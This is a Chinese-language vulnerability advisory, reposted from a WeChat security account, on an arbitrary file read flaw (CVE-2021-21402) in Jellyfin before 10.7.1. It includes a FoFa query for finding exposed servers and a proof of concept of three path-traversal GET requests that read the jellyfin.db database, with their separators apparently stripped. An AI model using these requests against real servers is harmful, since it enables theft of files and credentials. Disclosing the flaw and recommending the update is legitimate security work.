漏洞简介
Jellyfin 是一个自由的软件媒体系统,用于控制和管理媒体和流媒体。它是 emby 和 plex 的替代品,它通过多个应用程序从专用服务器向终端用户设备提供媒体。Jellyfin 属于 Emby 3.5.2 的下一代,并移植 .NET 核心框架,以支持完全的跨平台支持。
漏洞描述
Jellyfin10.7.1版本中,攻击者恶意构造请求将允许从Jellyfin服务器的文件系统中读取任意文件。当Windows用作主机OS时,此问题更加普遍。暴露于公共Internet的服务器可能会受到威胁。在版本10.7.1中已修复此问题。解决方法是,用户可以通过在文件系统上实施严格的安全权限来限制某些访问,但是建议尽快进行更新。
影响版本:Jellyfin<10.7.1
搜索引擎
注:互联网资产非授权请勿测试
FoFa搜索:"Jellyfin"
漏洞复现
POC
GET /Audio/anything/hls/..datajellyfin.db/stream.mp3/ HTTP/1.1GET /Videos/anything/hls/m/..datajellyfin.db HTTP/1.1GET /Videos/anything/hls/..datajellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1
文件读取
整改建议
更新到最新版本:V10.7.1
参考链接:
https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1
END
长按识别二维码,了解更多
本文始发于微信公众号(易东安全研究院):Jellyfin任意文件读取漏洞(CVE-2021-21402)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论